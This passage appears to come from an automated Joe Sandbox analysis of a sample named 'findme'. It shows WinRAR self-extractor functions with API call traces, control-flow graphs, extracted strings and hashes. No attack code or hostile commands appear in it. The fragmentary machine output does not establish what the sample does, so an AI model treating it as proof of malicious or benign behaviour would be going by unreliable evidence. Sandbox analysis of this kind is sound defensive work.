__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24772->24773 24774 4ea726 24773->24774 24774->24763 24775->24767 24826 4e1eb0 6 API calls 4 library calls

                    Executed Functions

                    Function 004DD5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197filesleeptimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004D00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 004D00E4
                      • Part of subcall function 004D00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004D00F6
                      • Part of subcall function 004D00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004D0127
                      • Part of subcall function 004D9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004D9DAC
                      • Part of subcall function 004DA335: OleInitialize.OLE32(00000000), ref: 004DA34E
                      • Part of subcall function 004DA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004DA385
                      • Part of subcall function 004DA335: SHGetMalloc.SHELL32(00508430), ref: 004DA38F
                      • Part of subcall function 004D13B3: GetCPInfo.KERNEL32(00000000,?), ref: 004D13C4
                      • Part of subcall function 004D13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 004D13D8
                    • GetCommandLineW.KERNEL32 ref: 004DD61C
                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 004DD643
                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 004DD654
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 004DD68E
                      • Part of subcall function 004DD287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004DD29D
                      • Part of subcall function 004DD287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004DD2D9
                    • CloseHandle.KERNEL32(00000000), ref: 004DD697
                    • GetModuleFileNameW.KERNEL32(00000000,0051DC90,00000800), ref: 004DD6B2
                    • SetEnvironmentVariableW.KERNEL32(sfxname,0051DC90), ref: 004DD6BE
                    • GetLocalTime.KERNEL32(?), ref: 004DD6C9
                    • _swprintf.LIBCMT ref: 004DD708
                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 004DD71A
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004DD721
                    • LoadIconW.USER32(00000000,00000064), ref: 004DD738
                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 004DD789
                    • Sleep.KERNEL32(?), ref: 004DD7B7
                    • DeleteObject.GDI32 ref: 004DD7F0
                    • DeleteObject.GDI32(?), ref: 004DD800
                    • CloseHandle.KERNEL32 ref: 004DD843
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjQ
                    • API String ID: 788466649-414108644
                    • Opcode ID: c15cd20c872da9d6894c3ee8e2ad1fd030cf93d5452b753f6b654ac1779f7209
                    • Instruction ID: c0839946cf09a0977f3c9278d8ad0cd0f8800795f8235ef77e99927a04240ab9
                    • Opcode Fuzzy Hash: c15cd20c872da9d6894c3ee8e2ad1fd030cf93d5452b753f6b654ac1779f7209
                    • Instruction Fuzzy Hash: AA61C371904241AFD720AF62EC59F7B3BA8BB55709F00042FF94592391DF7C8908E7AA
                    Function 004D9E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 770 4d9e1c-4d9e38 FindResourceW 771 4d9f2f-4d9f32 770->771 772 4d9e3e-4d9e50 SizeofResource 770->772 773 4d9e70-4d9e72 772->773 774 4d9e52-4d9e61 LoadResource 772->774 776 4d9f2e 773->776 774->773 775 4d9e63-4d9e6e LockResource 774->775 775->773 777 4d9e77-4d9e8c GlobalAlloc 775->777 776->771 778 4d9f28-4d9f2d 777->778 779 4d9e92-4d9e9b GlobalLock 777->779 778->776 780 4d9f21-4d9f22 GlobalFree 779->780 781 4d9ea1-4d9ebf call 4df4b0 CreateStreamOnHGlobal 779->781 780->778 784 4d9f1a-4d9f1b GlobalUnlock 781->784 785 4d9ec1-4d9ee3 call 4d9d7b 781->785 784->780 785->784 790 4d9ee5-4d9eed 785->790 791 4d9eef-4d9f03 GdipCreateHBITMAPFromBitmap 790->791 792 4d9f08-4d9f16 790->792 791->792 793 4d9f05 791->793 792->784 793->792
                    APIs
                    • FindResourceW.KERNEL32(004DAE4D,PNG,?,?,?,004DAE4D,00000066), ref: 004D9E2E
                    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,004DAE4D,00000066), ref: 004D9E46
                    • LoadResource.KERNEL32(00000000,?,?,?,004DAE4D,00000066), ref: 004D9E59
                    • LockResource.KERNEL32(00000000,?,?,?,004DAE4D,00000066), ref: 004D9E64
                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004DAE4D,00000066), ref: 004D9E82
                    • GlobalLock.KERNEL32(00000000), ref: 004D9E93
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 004D9EB7
                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004D9EFC
                    • GlobalUnlock.KERNEL32(00000000), ref: 004D9F1B
                    • GlobalFree.KERNEL32(00000000), ref: 004D9F22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                    • String ID: PNG
                    • API String ID: 3656887471-364855578
                    • Opcode ID: 45022d65e5181718567d77983882867527b0c31fc0af38627596db5bffa441cc
                    • Instruction ID: eed9491eb34e78a7319373fac980ce6a4c9e04edb097c56ae0d9a1eecced45d7
                    • Opcode Fuzzy Hash: 45022d65e5181718567d77983882867527b0c31fc0af38627596db5bffa441cc
                    • Instruction Fuzzy Hash: 41319F71204706AFC7109F61DC58A2BBBADFF99752B04092FF906D2360EB35DC10DAA9
                    Function 004CA5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 966 4ca5f4-4ca61f call 4de360 969 4ca691-4ca69a FindNextFileW 966->969 970 4ca621-4ca632 FindFirstFileW 966->970 971 4ca69c-4ca6aa GetLastError 969->971 972 4ca6b0-4ca6b2 969->972 973 4ca6b8-4ca75c call 4cfe56 call 4cbcfb call 4d0e19 * 3 970->973 974 4ca638-4ca64f call 4cb66c 970->974 971->972 972->973 975 4ca761-4ca774 972->975 973->975 981 4ca66a-4ca673 GetLastError 974->981 982 4ca651-4ca668 FindFirstFileW 974->982 984 4ca684 981->984 985 4ca675-4ca678 981->985 982->973 982->981 988 4ca686-4ca68c 984->988 985->984 987 4ca67a-4ca67d 985->987 987->984 990 4ca67f-4ca682 987->990 988->975 990->988
                    APIs
                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA628
                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA65E
                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA66A
                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA692
                    • GetLastError.KERNEL32(?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA69E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FileFind$ErrorFirstLast$Next
                    • String ID:
                    • API String ID: 869497890-0
                    • Opcode ID: 19e426b5d8a8e044277fa6e3b2de332a114b3f48a1d46cd4faeaaf07d980b501
                    • Instruction ID: f945405c9babf90bdaee574cc3be0c352191bc5f2e40214835b2d39476923822
                    • Opcode Fuzzy Hash: 19e426b5d8a8e044277fa6e3b2de332a114b3f48a1d46cd4faeaaf07d980b501
                    • Instruction Fuzzy Hash: DD414175604645AFC364EF68C884ADBF7E8BB48344F04092FF5D9D3240D778A9648B96
                    Function 004E753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,?,004E7513,00000000,004FBAD8,0000000C,004E766A,00000000,00000002,00000000), ref: 004E755E
                    • TerminateProcess.KERNEL32(00000000,?,004E7513,00000000,004FBAD8,0000000C,004E766A,00000000,00000002,00000000), ref: 004E7565
                    • ExitProcess.KERNEL32 ref: 004E7577
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 8b836b35bee10b1a4236200216402ce863bd320584c310fedc36eeabb44f929b
                    • Instruction ID: 6ab8af859084be70304be51d2b7ac1fd3e36db93b203cbf8e1b61aa311892b27
                    • Opcode Fuzzy Hash: 8b836b35bee10b1a4236200216402ce863bd320584c310fedc36eeabb44f929b
                    • Instruction Fuzzy Hash: D8E0E631004584BFCF11AF56DD49A593F69EF40797F104465F9054A632CB39DE52CB58
                    Function 004C857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog_memcmp
                    • String ID:
                    • API String ID: 3004599000-0
                    • Opcode ID: 9de05b284013f89fe3d30eafb1efc6461f76e292d245de6de3b6dfa9a73fb903
                    • Instruction ID: 8714b45bca06e1e27a6fe8e92ed762438cdb8a6096da4fc4a8987e1cd6d87c62
                    • Opcode Fuzzy Hash: 9de05b284013f89fe3d30eafb1efc6461f76e292d245de6de3b6dfa9a73fb903
                    • Instruction Fuzzy Hash: 09822B78904245AEDF65DB60C885FFBB7B9AF05304F0840BFE8499B242DB385E45CB69
                    Function 004DAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004DAEE5
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prologItemTextWindow
                    • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                    • API String ID: 810644672-3617005944
                    • Opcode ID: 30fc7c9c03ba588d29c46bba2f20741392b5f7c70df25dc43ff57b57699c6c58
                    • Instruction ID: bf604449daf891657f977376b9c3300243c78cb423d2f7769eb161c6dee824af
                    • Opcode Fuzzy Hash: 30fc7c9c03ba588d29c46bba2f20741392b5f7c70df25dc43ff57b57699c6c58
                    • Instruction Fuzzy Hash: 1842D774944244BEEB21AB609C9AFBF7B7CEB12708F00405BF641A63D1CB7C4949DB69
                    Function 004D00CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317libraryfileloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 257 4d00cf-4d00ee call 4de360 GetModuleHandleW 260 4d0154-4d03b2 257->260 261 4d00f0-4d0107 GetProcAddress 257->261 264 4d03b8-4d03c3 call 4e70dd 260->264 265 4d0484-4d04b3 GetModuleFileNameW call 4cbc85 call 4cfe56 260->265 262 4d0109-4d011f 261->262 263 4d0121-4d0131 GetProcAddress 261->263 262->263 263->260 266 4d0133-4d0152 263->266 264->265 274 4d03c9-4d03fa GetModuleFileNameW CreateFileW 264->274 280 4d04b5-4d04bf call 4cacf5 265->280 266->260 275 4d03fc-4d040a SetFilePointer 274->275 276 4d0478-4d047f CloseHandle 274->276 275->276 278 4d040c-4d0429 ReadFile 275->278 276->265 278->276 282 4d042b-4d0450 278->282 285 4d04cc 280->285 286 4d04c1-4d04c5 call 4d0085 280->286 284 4d046d-4d0476 call 4cfbd8 282->284 284->276 294 4d0452-4d046c call 4d0085 284->294 289 4d04ce-4d04d0 285->289 291 4d04ca 286->291 292 4d04f2-4d0518 call 4cbcfb GetFileAttributesW 289->292 293 4d04d2-4d04f0 CompareStringW 289->293 291->289 296 4d051a-4d051e 292->296 301 4d0522 292->301 293->292 293->296 294->284 296->280 300 4d0520 296->300 302 4d0526-4d0528 300->302 301->302 303 4d052a 302->303 304 4d0560-4d0562 302->304 305 4d052c-4d0552 call 4cbcfb GetFileAttributesW 303->305 306 4d066f-4d0679 304->306 307 4d0568-4d057f call 4cbccf call 4cacf5 304->307 312 4d055c 305->312 313 4d0554-4d0558 305->313 317 4d05e7-4d061a call 4c400a AllocConsole 307->317 318 4d0581-4d05e2 call 4d0085 * 2 call 4cddd1 call 4c400a call 4cddd1 call 4d9f35 307->318 312->304 313->305 315 4d055a 313->315 315->304 323 4d061c-4d0661 GetCurrentProcessId AttachConsole call 4e35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->323 324 4d0667-4d0669 ExitProcess 317->324 318->324 323->324
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32), ref: 004D00E4
                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004D00F6
                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004D0127
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004D03D4
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004D03F0
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D0402
                    • ReadFile.KERNEL32(00000000,?,00007FFE,004F3BA4,00000000), ref: 004D0421
                    • CloseHandle.KERNEL32(00000000), ref: 004D0479
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004D048F
                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 004D04E7
                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 004D0510
                    • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 004D054A
                      • Part of subcall function 004D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
                      • Part of subcall function 004D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll,00000000,004CEC0A,?,?,004CEBEC,?,?,?), ref: 004D00C2
                    • _swprintf.LIBCMT ref: 004D05BE
                    • _swprintf.LIBCMT ref: 004D060A
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • AllocConsole.KERNEL32 ref: 004D0612
                    • GetCurrentProcessId.KERNEL32 ref: 004D061C
                    • AttachConsole.KERNEL32(00000000), ref: 004D0623
                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004D0649
                    • WriteConsoleW.KERNEL32(00000000), ref: 004D0650
                    • Sleep.KERNEL32(00002710), ref: 004D065B
                    • FreeConsole.KERNEL32 ref: 004D0661
                    • ExitProcess.KERNEL32 ref: 004D0669
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                    • String ID: <O$ ?O$(>O$(@O$0AO$4=O$8<O$<?O$@>O$@@O$D=O$DAO$DXGIDebug.dll$P<O$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;O$T?O$X>O$X@O$\AO$`=O$dwmapi.dll$kernel32$l<O$p>O$p?O$p@O$uxtheme.dll$x=O$|<O$>O$?O
                    • API String ID: 1201351596-3813428612
                    • Opcode ID: 55fe34a03b3f82dcf122938e1ae2717ff0ff7393475e469ce920725845cb7120
                    • Instruction ID: b4d3904048076ea8c7d18f143ab4b23798e86a5d8201a64a31381d9f7f192d8a
                    • Opcode Fuzzy Hash: 55fe34a03b3f82dcf122938e1ae2717ff0ff7393475e469ce920725845cb7120
                    • Instruction Fuzzy Hash: 7CD15471104388AFD720DF50D859FAFB6E8AB85706F50891FF78597240DB788648CB6E
                    Function 004DBDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 406 4dbdf5-4dbe0d call 4de28c call 4de360 411 4dca90-4dca9d 406->411 412 4dbe13-4dbe3d call 4daa36 406->412 412->411 415 4dbe43-4dbe48 412->415 416 4dbe49-4dbe57 415->416 417 4dbe58-4dbe6d call 4da6c7 416->417 420 4dbe6f 417->420 421 4dbe71-4dbe86 call 4d17ac 420->421 424 4dbe88-4dbe8c 421->424 425 4dbe93-4dbe96 421->425 424->421 428 4dbe8e 424->428 426 4dca5c-4dca87 call 4daa36 425->426 427 4dbe9c 425->427 426->416 439 4dca8d-4dca8f 426->439 429 4dc115-4dc117 427->429 430 4dc074-4dc076 427->430 431 4dbea3-4dbea6 427->431 432 4dc132-4dc134 427->432 428->426 429->426 437 4dc11d-4dc12d SetWindowTextW 429->437 430->426 435 4dc07c-4dc088 430->435 431->426 436 4dbeac-4dbf06 call 4d9da4 call 4cb965 call 4ca49d call 4ca5d7 call 4c70bf 431->436 432->426 434 4dc13a-4dc141 432->434 434->426 440 4dc147-4dc160 434->440 441 4dc09c-4dc0a1 435->441 442 4dc08a-4dc09b call 4e7168 435->442 497 4dc045-4dc05a call 4ca52a 436->497 437->426 439->411 444 4dc168-4dc176 call 4e35b3 440->444 445 4dc162 440->445 448 4dc0ab-4dc0b6 call 4dab9a 441->448 449 4dc0a3-4dc0a9 441->449 442->441 444->426 461 4dc17c-4dc185 444->461 445->444 453 4dc0bb-4dc0bd 448->453 449->453 458 4dc0bf-4dc0c6 call 4e35b3 453->458 459 4dc0c8-4dc0e8 call 4e35b3 call 4e35de 453->459 458->459 480 4dc0ea-4dc0f1 459->480 481 4dc101-4dc103 459->481 465 4dc1ae-4dc1b1 461->465 466 4dc187-4dc18b 461->466 472 4dc1b7-4dc1ba 465->472 473 4dc296-4dc2a4 call 4cfe56 465->473 466->465 470 4dc18d-4dc195 466->470 470->426 476 4dc19b-4dc1a9 call 4cfe56 470->476 478 4dc1bc-4dc1c1 472->478 479 4dc1c7-4dc1e2 472->479 489 4dc2a6-4dc2ba call 4e17cb 473->489 476->489 478->473 478->479 492 4dc22c-4dc233 479->492 493 4dc1e4-4dc21e 479->493 486 4dc0f8-4dc100 call 4e7168 480->486 487 4dc0f3-4dc0f5 480->487 481->426 488 4dc109-4dc110 call 4e35ce 481->488 486->481 487->486 488->426 507 4dc2bc-4dc2c0 489->507 508 4dc2c7-4dc318 call 4cfe56 call 4da8d0 GetDlgItem SetWindowTextW SendMessageW call 4e35e9 489->508 499 4dc235-4dc24d call 4e35b3 492->499 500 4dc261-4dc284 call 4e35b3 * 2 492->500 528 4dc220 493->528 529 4dc222-4dc224 493->529 514 4dbf0b-4dbf1f SetFileAttributesW 497->514 515 4dc060-4dc06f call 4ca4b3 497->515 499->500 519 4dc24f-4dc25c call 4cfe2e 499->519 500->489 533 4dc286-4dc294 call 4cfe2e 500->533 507->508 513 4dc2c2-4dc2c4 507->513 540 4dc31d-4dc321 508->540 513->508 520 4dbfc5-4dbfd5 GetFileAttributesW 514->520 521 4dbf25-4dbf58 call 4cb4f7 call 4cb207 call 4e35b3 514->521 515->426 519->500 520->497 527 4dbfd7-4dbfe6 DeleteFileW 520->527 549 4dbf6b-4dbf79 call 4cb925 521->549 550 4dbf5a-4dbf69 call 4e35b3 521->550 527->497 534 4dbfe8-4dbfeb 527->534 528->529 529->492 533->489 538 4dbfef-4dc01b call 4c400a GetFileAttributesW 534->538 547 4dbfed-4dbfee 538->547 548 4dc01d-4dc033 MoveFileW 538->548 540->426 544 4dc327-4dc33b SendMessageW 540->544 544->426 547->538 548->497 551 4dc035-4dc03f MoveFileExW 548->551 549->515 556 4dbf7f-4dbfbe call 4e35b3 call 4df350 549->556 550->549 550->556 551->497 556->520
                    APIs
                    • __EH_prolog.LIBCMT ref: 004DBDFA
                      • Part of subcall function 004DAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004DAAFE
                    • SetWindowTextW.USER32(?,?), ref: 004DC127
                    • _wcsrchr.LIBVCRUNTIME ref: 004DC2B1
                    • GetDlgItem.USER32(?,00000066), ref: 004DC2EC
                    • SetWindowTextW.USER32(00000000,?), ref: 004DC2FC
                    • SendMessageW.USER32(00000000,00000143,00000000,0050A472), ref: 004DC30A
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004DC335
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                    • API String ID: 3564274579-312220925
                    • Opcode ID: 80bab93ad6b2ca4a04965a0a6b9995a0ca874c0ede058d2d44014fd50d17c633
                    • Instruction ID: 390dcf187c68a254f192ab67eda38ebb7384fc6a0a0cd5d685340c11b59032f3
                    • Opcode Fuzzy Hash: 80bab93ad6b2ca4a04965a0a6b9995a0ca874c0ede058d2d44014fd50d17c633
                    • Instruction Fuzzy Hash: FAE19176D00119AADF25DBA1DC99EEF737CAF19305F0040ABF605E3250EB789A84CB58
                    Function 004CD341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
